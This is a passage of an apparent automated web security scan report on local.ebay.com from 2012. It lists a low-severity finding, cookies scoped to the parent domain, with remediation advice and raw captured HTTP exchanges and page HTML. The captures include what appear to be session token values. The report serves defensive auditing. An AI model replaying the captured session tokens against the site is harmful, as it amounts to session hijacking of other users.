function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
function $4(){return function(event){return this.init();};};_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.filter.Filter);_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.categorylist.CategoryList);_d.add('body','load',function(event) { this.initFS(); },vjo.ebay.local.srp.filmstrip.Filmstrip);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.setLocalProducts({"item_1":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}]}); },vjo.ebay.local.srp.map.localpickup.LocalPickupMap);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b3236-->

2. Cookie scoped to parent domain  previous  next
There are 22 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://local.ebay.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD / HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89cef3
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOAYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmPYfEVP; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OAYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmMAywABTwVJCDFkyjHB; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Thu, 05 Jan 2012 06:23:59 GMT


2.2. http://local.ebay.com/%22http:/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /%22http:/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%22http:/ HTTP/1.1
Referer: http://local.ebay.com/%22http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif/%22
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MnyBDM; nonsession=CgADKACBYa0OAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJCDEWKjCW
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8a39cc
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpObYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2PJ8SOy; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0ObYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJIzLbxUrv; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:27 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 35822
Date: Thu, 05 Jan 2012 06:24:27 GMT
nnCoection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325719836074" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325719836074;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AD1WaLJI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="19694239" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/613/731/200/14613993_19403731_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19694239&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Nespresso - Essenza Espresso Maker - Black'>Nespresso - Essenza Espresso Maker - Black</a>
</div><div class="price"><span class="price">$149.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19582113" coords="32.68162,-97.111413,13331,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13331.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/458/256/200/14458643_18843256_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19582113&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Xbox 360 4GB Kinect Super Bundle'>Xbox 360 4GB Kinect Super Bundle</a>
</div><div class="price"><span class="price">$429.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="4434390" coords="33.008115,-96.70534,3040,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/006/422/170/200/6422484_15811170_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=4434390&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Xbox 360 4GB Console with Kinect for Xbox 360'>Xbox 360 4GB Console with Kinect for Xbox 360</a>
</div><div class="price"><span class="price">$299.96<span class="sep">-</span>$299.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="20119725" coords="32.869443,-96.773501,13820,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13820.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/015/069/496/200/15069091_20474496_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=20119725&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Isotoner Gloves, Matrix Nylon SmarTouch Gloves'>Isotoner Gloves, Matrix Nylon SmarTouch Gloves</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16708043" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/470/797/200/11470903_18708797_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16708043&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Barbie Collector-Fam CHLD Doll Inspired By Gustav Klimt'>Barbie Collector-Fam CHLD Doll Inspired By Gustav Klimt</a>
</div><div class="price"><span class="price">$34.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab0f55cc1340a5e2c6324c52ff8bfe90");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
